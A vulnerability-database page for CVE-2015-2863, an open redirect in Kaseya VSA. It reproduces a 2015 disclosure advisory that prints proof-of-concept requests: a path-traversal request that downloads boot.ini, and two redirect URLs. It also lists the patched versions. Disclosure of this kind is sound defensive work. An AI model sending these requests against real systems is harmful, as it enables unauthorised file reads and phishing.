CVE-2015-2863

medium

Published 2015-07-20 · Modified 2026-05-06

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

5.3

Description

Open redirect vulnerability in Kaseya Virtual System Administrator (VSA) 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-37621 webapps windows text · 2 KB

Pedro Ribeiro · 2015-07-15

Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (1)

text exploit Source: Exploit-DB

>> Multiple vulnerabilities in Kaseya Virtual System Administrator 
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
==========================================================================
Disclosure: 13/07/2015 / Last updated: 28/09/2015 

>> Background on the affected product:
"Kaseya VSA is an integrated IT Systems Management platform that can be leveraged seamlessly across IT disciplines to streamline and automate your IT services. Kaseya VSA integrates key management capabilities into a single platform. Kaseya VSA makes your IT staff more productive, your services more reliable, your systems more secure, and your value easier to show."

A special thanks to CERT and ZDI for assisting with the vulnerability reporting process.
These vulnerabilities were disclosed by CERT under ID 919604 [1] on 13/07/2015.


>> Technical details:
#1
Vulnerability: Arbitary file download (authenticated)
CVE-2015-2862 / CERT ID 919604
Affected versions: unknown, at least v7 to v9.1

GET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini
Referer: http://10.0.0.3/

A valid login is needed, and the Referrer header must be included. A sample request can be obtained by downloading any file attached to any ticket, and then modifying it with the appropriate path traversal. 
This will download the C:\boot.ini file when Kaseya is installed in the default C:\Kaseya directory. The file download root is the WebPages directory (<Kaseya_Install_Dir>\WebPages\).


#2
Vulnerability: Open redirect (unauthenticated)
CVE-2015-2863 / CERT ID 919604
Affected versions: unknown, at least v7 to v9.1

a)
http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com

b)
GET /vsaPres/Web20/core/LocalProxy.ashx?url=http://www.google.com
Host: www.google.com
(host header has to be spoofed to the target)


>> Fix: 
R9.1: install patch 9.1.0.4
R9.0: install patch 9.0.0.14
R8.0: install patch 8.0.0.18
V7.0: install patch 7.0.0.29


>> References:
[1] https://www.kb.cert.org/vuls/id/919604

================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

Application impact

Vendor	Product	Versions	Fixed
kaseya	virtual_system_administrator	`{"startIncluding":"7.0","endExcluding":"7.0.0.29"}`	`7.0.0.29`

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.